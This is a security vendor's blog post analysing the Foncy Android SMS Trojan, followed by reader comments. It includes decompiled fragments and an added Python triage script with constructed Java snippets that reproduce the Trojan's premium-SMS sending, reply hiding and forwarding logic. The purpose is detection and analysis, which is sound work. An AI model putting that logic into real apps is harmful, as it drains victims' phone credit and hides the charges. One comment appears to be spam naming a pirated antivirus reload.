
SMS Trojans: all around the world

Denis
Kaspersky Lab Expert
Posted November 25, 2011, 09:03 GMT
Tags: Mobile Malware

In the middle of July I wrote about porn SMS senders which covertly subscribed users to a range of premium-rate services with the promise of raunchy images. These applications were targeting users from the US, Malaysia, the Netherlands, the UK, Kenya and South Africa. At the end of that blog post I wrote that ‘…the appearance of several applications which use premium rate SMS messages and target users from completely different countries leads us to the conclusion that it’s no longer just a problem in Russia and China, unfortunately’.

Now the problem has evolved into SMS Trojans that target users in a number of European countries and in Canada. Notably, these SMS Trojans target neither Russian nor Chinese smartphone users.

According to messages we found on Internet forums, the first infections were reported in early September. Someone downloaded an application for managing and monitoring his own SMS/MMS messages, calls and data traffic. When launched, the application displayed a message saying it was not compatible with the user’s Android version. Shortly afterwards the user’s mobile account was emptied.

We tracked down this application and, unsurprisingly, it turned out to be an SMS Trojan which sends 4 SMS messages to premium-rate numbers. We detect it as Trojan-SMS.AndroidOS.Foncy.

It was spread via a file hosting website with the name ‘SuiConFo.apk’. After installation, it appears on the main menu of Android smartphones:

There are 2 main malicious classes in this Trojan: ‘MagicSMSActivity.class’ and ‘SMSReceiver.class’. The first is mainly responsible for sending SMS messages, while the second is used to hide incoming messages from specific numbers. As mentioned above, when launched the app shows an ‘Android version is not compatible’ error message:

Right after displaying this message, the Trojan calls the public getSimCountryIso method of the TelephonyManager class to retrieve the ISO country code of the SIM card:

After that, the malware defines the variables ‘s1’ (SMS number) and ‘s2’ (SMS text):

The list of countries consists of 8 options: France (81001 SMS number), Belgium (9903 SMS number), Switzerland (543 SMS number), Luxembourg (64747 SMS number), Canada (60999 SMS number), Germany (63000 SMS number), Spain (35064 SMS number), and the UK (60999 SMS number).

It looks like the virus writers made a mistake in the code. The Trojan sends each SMS message using the sendTextMessage method of the SmsManager class:

smsmanager.sendTextMessage(s1, null, s2, pendingintent, pendingintent1)

where ‘s1’ is a number and ‘s2’ is a text. These variables are defined correctly for all countries except Canada:

if(s.equals("ca"))
{
    s1 = "SP";
    s2 = "60999";
}

After determining the country and, therefore, the number and message text, the Trojan sends 4 SMS messages using the sendTextMessage method as described above.

SMSReceiver.class is responsible for hiding incoming SMS messages from particular numbers. If an incoming SMS message comes from one of the following numbers: 81001, 35064, 63000, 9903, 60999, 543, 64747, the Trojan tries to hide it by calling abortBroadcast. The sender’s number is retrieved from the SMS message with getDisplayOriginatingAddress. Note that abortBroadcast only has an effect on ordered broadcasts, so this trick works only because the receiver is registered for the incoming-SMS broadcast with a priority high enough to run before the stock messaging application; hiding the carrier’s confirmation messages is what keeps the victim from noticing the subscription until the account is empty.

There is another interesting thing lurking inside this malware. If you look at this part of the code:

you may notice that after hiding the incoming message (abortBroadcast) the Trojan sends one more SMS, to a French mobile phone number, with the text stored in the ‘s’ variable. That ‘s’ variable is populated with the getMessageBody method when an incoming SMS message arrives.

In other words, the Trojan forwards the text of each reply from a premium-rate number to a French mobile phone number. This is most likely how the cybercriminals keep track of how many premium SMS messages have been sent.
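The two halves of this Trojan, the country-keyed dispatch in MagicSMSActivity (getSimCountryIso, then sendTextMessage with ‘s1’/‘s2’) and the reply suppression in SMSReceiver (getDisplayOriginatingAddress, abortBroadcast, getMessageBody), together form a pattern an analyst can look for in decompiled code. The script below is an added example, not Kaspersky’s tooling or code from the sample itself: it runs a static triage over two constructed snippets of decompiler-style Java that reproduce the behaviour described above. The short codes are the ones listed in this post; the "SP" message body for the non-Canadian branches and the "+33XXXXXXXXX" forwarding number are placeholders, since the post does not give those values.

```python
"""Static triage of decompiled Android code for the premium-rate SMS Trojan
pattern described in the post. Added example, not the analysed sample's code;
both input snippets below are constructed to mirror the described behaviour."""
import re
from dataclasses import dataclass, field

# Constructed sample modelled on MagicSMSActivity: the SIM country selects the
# destination (s1) and body (s2), then 4 messages are sent. Short codes are the
# ones from the post; the "SP" body outside the Canadian branch is an assumption.
SENDER_SAMPLE = """
String s = telephonymanager.getSimCountryIso();
if(s.equals("fr")) { s1 = "81001"; s2 = "SP"; }
if(s.equals("be")) { s1 = "9903"; s2 = "SP"; }
if(s.equals("ch")) { s1 = "543"; s2 = "SP"; }
if(s.equals("lu")) { s1 = "64747"; s2 = "SP"; }
if(s.equals("ca")) { s1 = "SP"; s2 = "60999"; }
if(s.equals("de")) { s1 = "63000"; s2 = "SP"; }
if(s.equals("es")) { s1 = "35064"; s2 = "SP"; }
if(s.equals("gb")) { s1 = "60999"; s2 = "SP"; }
for(int i = 0; i < 4; i++)
    smsmanager.sendTextMessage(s1, null, s2, pendingintent, pendingintent1);
"""

# Constructed sample modelled on SMSReceiver: replies from the premium numbers
# are swallowed and their body forwarded. "+33XXXXXXXXX" is a placeholder.
RECEIVER_SAMPLE = """
String s3 = smsmessage.getDisplayOriginatingAddress();
String s = smsmessage.getMessageBody();
if(s3.equals("81001") || s3.equals("35064") || s3.equals("63000")
   || s3.equals("9903") || s3.equals("60999") || s3.equals("543")
   || s3.equals("64747")) {
    abortBroadcast();
    smsmanager.sendTextMessage("+33XXXXXXXXX", null, s, null, null);
}
"""

INDICATOR_APIS = ("getSimCountryIso", "sendTextMessage", "abortBroadcast",
                  "getDisplayOriginatingAddress", "getMessageBody")

# Matches: if(s.equals("ca")) { s1 = "..."; s2 = "..."; }
BRANCH_RE = re.compile(
    r'equals\("([a-z]{2})"\)\)\s*\{\s*s1\s*=\s*"([^"]*)";\s*s2\s*=\s*"([^"]*)";')
# Premium short codes are 3-6 digits; anything else in the destination slot is odd.
SHORT_CODE_RE = re.compile(r"^\d{3,6}$")
LITERAL_NUMBER_RE = re.compile(r'equals\("(\d{3,6})"\)')


@dataclass
class Report:
    apis: set = field(default_factory=set)
    dispatch: dict = field(default_factory=dict)   # country -> (destination, body)
    swapped: list = field(default_factory=list)    # countries with slots inverted
    suppressed: set = field(default_factory=set)   # senders hidden by the receiver
    verdict: str = ""


def triage(sender_src: str, receiver_src: str) -> Report:
    rep = Report()
    code = sender_src + receiver_src
    rep.apis = {api for api in INDICATOR_APIS if api + "(" in code}

    for country, dest, body in BRANCH_RE.findall(sender_src):
        rep.dispatch[country] = (dest, body)
        # The Canada-style bug: the short code ended up in the body slot.
        if not SHORT_CODE_RE.match(dest) and SHORT_CODE_RE.match(body):
            rep.swapped.append(country)

    if "abortBroadcast" in rep.apis:
        rep.suppressed = set(LITERAL_NUMBER_RE.findall(receiver_src))

    sent_to = {d for d, _ in rep.dispatch.values() if SHORT_CODE_RE.match(d)}
    # A receiver that hides replies from exactly the numbers the app sends to is
    # the premium-SMS Trojan signature; either half alone is far less conclusive.
    if sent_to and sent_to <= rep.suppressed and "sendTextMessage" in rep.apis:
        rep.verdict = "premium-SMS trojan pattern"
    elif rep.apis & {"sendTextMessage", "abortBroadcast"}:
        rep.verdict = "suspicious SMS handling"
    else:
        rep.verdict = "no SMS indicators"
    return rep


def effective_destinations(rep: Report) -> dict:
    """Destination actually handed to sendTextMessage per country; None where a
    swapped branch addresses the message to the literal body text instead."""
    return {c: (d if SHORT_CODE_RE.match(d) else None)
            for c, (d, _) in rep.dispatch.items()}


if __name__ == "__main__":
    r = triage(SENDER_SAMPLE, RECEIVER_SAMPLE)
    print(r.verdict, sorted(r.apis))
    print("swapped branches:", r.swapped)
    print("effective destinations:", effective_destinations(r))
```

The two checks that matter are the last ones: the set of short codes the sender dispatches to being a subset of the numbers the receiver suppresses, and a branch whose destination slot is not a short code while its body slot is. On real decompiler output the variable names and brace layout will differ, so the regexes are a starting point for a smali or Java walker rather than a signature.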

Unfortunately, SMS Trojans are today one of the easiest ways for cybercriminals to make money fast. Malicious use of premium-rate SMS services is spreading around the world, and I’m pretty sure it’s not going to stop any time soon. We’ll keep you posted.


3 comments


aloudroid

2011 Nov 29, 12:13

The "real" SuiConFo is not a malicious app

Hi, I'm the developer of the real SuiConFo app, which is a paid app, rated 4.3 stars on the Android Market.
That SuiConFo.apk that can be found on the internet has NOTHING to do with the original application.
My app can only be bought on the Android Market and YAAM (alternative market) and is not a free app. It helps you track your plan efficiently, and does not send messages or share your data to/with anyone.

People should use trusted sources to download apps on their phones, and obviously, a 4.3 rated paid app doesn't contain a trojan or any sort of malware.

Analyze the code of the app from the market and you'll see it doesn't contain the code samples that were found in this article: https://market.android.com/details?id=com.aloudroid.suiviforfait

Best regards,

Alou


osama

2011 Dec 02, 02:42

aloudroid

Kaspersky Anti-Virus 6.0 for Windows Workstations MP4 Reload Rbz

Reload Rbz

Device Kabiotr


Joshua Wright

2012 Feb 23, 20:21

Permission declaration for Foncy

Denis,

Looking at this malware sample retrieved from Contagio Mobile, a lot of permissions are declared in the AndroidManifest.xml file including SEND_SMS and RECEIVE_SMS (of course), but also READ_CONTACTS, ACCESS_GPS, ACCESS_LOCATION and others. When I install this app in the Android Emulator with GPS and GSM support, the installer only prompts me about the receive and send SMS privileges, not for any other of the declared privileges. Do you know why this is?

Thanks,

-Josh
